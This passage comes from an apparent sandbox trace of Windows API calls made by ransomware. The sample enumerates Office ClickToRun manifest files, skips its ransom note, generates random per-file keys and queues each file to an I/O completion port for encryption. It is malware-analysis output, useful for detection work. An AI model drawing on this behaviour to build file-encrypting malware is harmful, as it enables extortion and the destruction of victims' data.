(in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="0F") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="9F") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C6") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="D5") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="DF") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="C7") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="CF") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="54") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="A9") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="45") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="AA") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="29") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="5C") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="57") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="DA") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="36") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="10") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="07") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="6B") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="EB") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="76") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="7F") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="DE") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="85") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="33") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="33") returned 2 [0156.205] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="59") returned 2 [0156.206] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" [0156.206] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.206] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0156.206] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77e8c170, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x2b14, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.osmmui.msi.16.en-us.xml", cAlternateFileName="C25F09~1.XML")) returned 1 [0156.206] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml") returned 114 [0156.206] lstrcmpW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.206] PathFindExtensionW (pszPath="C2RManifest.osmmui.msi.16.en-us.xml") returned=".xml" [0156.206] lstrlenW (lpString=".xml") returned 4 [0156.206] PathFindExtensionW (pszPath="C2RManifest.osmmui.msi.16.en-us.xml") returned=".xml" [0156.206] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.206] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0156.206] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=11028) returned 1 [0156.206] GetProcessHeap () returned 0x270000 [0156.206] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74ea160 [0156.210] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="57") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="15") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="D7") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="DA") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="DD") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="EA") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="CB") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="77") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8C") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="52") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="C7") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="3C") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="F0") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="FF") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="11") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="47") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="E3") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="57") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="3A") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="45") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="06") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="3B") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="AD") returned 2 [0156.210] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="C2") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="D3") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="F7") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="79") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="E1") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="6D") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="11") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="22") returned 2 [0156.211] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="33") returned 2 [0156.211] lstrcpyW (in: lpString1=0x74fa214, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" [0156.211] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x74ea160, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.211] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74ea160, lpOverlapped=0x74ea160) returned 1 [0156.211] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x775eb1b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x8fa, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", cAlternateFileName="C22C6F~1.XML")) returned 1 [0156.211] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml") returned 127 [0156.211] lstrcmpW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.212] PathFindExtensionW (pszPath="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml") returned=".xml" [0156.212] lstrlenW (lpString=".xml") returned 4 [0156.212] PathFindExtensionW (pszPath="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml") returned=".xml" [0156.212] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.212] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0156.212] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=2298) returned 1 [0156.212] GetProcessHeap () returned 0x270000 [0156.212] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75122b8 [0156.216] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="37") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="D8") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="AE") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="5D") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="9E") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="04") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="3E") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="04") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B0") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="F0") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="6A") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="CD") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="B7") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="80") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="EC") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="47") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="80") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="2F") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="F6") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="27") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="4B") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="1F") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="40") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="F4") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="AE") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="85") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="47") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="AC") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="96") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="70") returned 2 [0156.216] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="FB") returned 2 [0156.217] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="36") returned 2 [0156.217] lstrcpyW (in: lpString1=0x752236c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" [0156.217] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x75122b8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.217] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75122b8, lpOverlapped=0x75122b8) returned 1 [0156.217] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77da7930, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x2698, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.osmuxmui.msi.16.en-us.xml", cAlternateFileName="C21C45~1.XML")) returned 1 [0156.217] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml") returned 116 [0156.217] lstrcmpW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.217] PathFindExtensionW (pszPath="C2RManifest.osmuxmui.msi.16.en-us.xml") returned=".xml" [0156.217] lstrlenW (lpString=".xml") returned 4 [0156.217] PathFindExtensionW (pszPath="C2RManifest.osmuxmui.msi.16.en-us.xml") returned=".xml" [0156.217] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.217] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0156.218] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=9880) returned 1 [0156.218] GetProcessHeap () returned 0x270000 [0156.218] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x753a410 [0156.221] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="4F") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="8F") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="E5") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="45") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="EC") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="B9") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="4E") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="3A") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="3F") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="CB") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="02") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="BC") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="C4") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="40") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="DA") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="E7") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3A") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="B0") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FF") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="16") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="CA") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="C3") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="B7") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="AF") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="D3") returned 2 [0156.222] lstrcpyW (in: lpString1=0x754a4c4, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" [0156.222] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x753a410, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.223] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x753a410, lpOverlapped=0x753a410) returned 1 [0156.223] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7752cad0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x16c9a, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", cAlternateFileName="C29151~1.XML")) returned 1 [0156.223] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml") returned 131 [0156.223] lstrcmpW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.223] PathFindExtensionW (pszPath="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml") returned=".xml" [0156.223] lstrlenW (lpString=".xml") returned 4 [0156.223] PathFindExtensionW (pszPath="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml") returned=".xml" [0156.223] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.223] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0156.224] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=93338) returned 1 [0156.224] GetProcessHeap () returned 0x270000 [0156.224] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7562568 [0156.228] lstrcpyW (in: lpString1=0x757261c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" [0156.228] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x7562568, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.228] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7562568, lpOverlapped=0x7562568) returned 1 [0156.228] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92db1230, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92db1230, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77ce9250, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x178c4, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.outlookmui.msi.16.en-us.xml", cAlternateFileName="C2C4E2~1.XML")) returned 1 [0156.228] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml") returned 118 [0156.228] lstrcmpW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.228] PathFindExtensionW (pszPath="C2RManifest.outlookmui.msi.16.en-us.xml") returned=".xml" [0156.228] lstrlenW (lpString=".xml") returned 4 [0156.228] PathFindExtensionW (pszPath="C2RManifest.outlookmui.msi.16.en-us.xml") returned=".xml" [0156.228] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.229] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0156.229] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=96452) returned 1 [0156.229] GetProcessHeap () returned 0x270000 [0156.229] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x758a6c0 [0156.233] lstrcpyW (in: lpString1=0x759a774, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" [0156.233] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x758a6c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.233] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, 